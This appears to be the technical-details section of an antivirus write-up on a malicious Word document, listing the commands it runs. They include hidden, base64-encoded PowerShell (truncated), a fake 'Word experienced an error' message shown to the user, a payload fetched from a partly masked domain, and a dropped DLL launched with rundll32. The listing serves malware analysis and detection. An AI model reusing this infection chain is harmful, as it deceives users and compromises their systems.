Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -ENCOD IAAgACQAcgBrAG0ANwA9AFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADUAfQB7ADIAfQB7ADQAfQAiAC0ARgAnAE0ALgAnACwAJwBTAHkAcwAnACwAJwBvAC4AJwAsACcAVABlACcALAAnAEQA...
- %HOMEPATH%\v__qrh4\tov5nnx\d9eidj4dv.dll
- http://de###reedom.org/qz0h69.pdf
- DNS ASK de###reedom.org
- '<SYSTEM32>\cmd.exe' cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAgACQAcgBrAG0ANwA9AFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADMAfQB7AD...
- '<SYSTEM32>\msg.exe' user /v Word experienced an error trying to open the file.
- '<SYSTEM32>\rundll32.exe' %HOMEPATH%\V__qrh4\Tov5nnx\D9eidj4dv.dll 0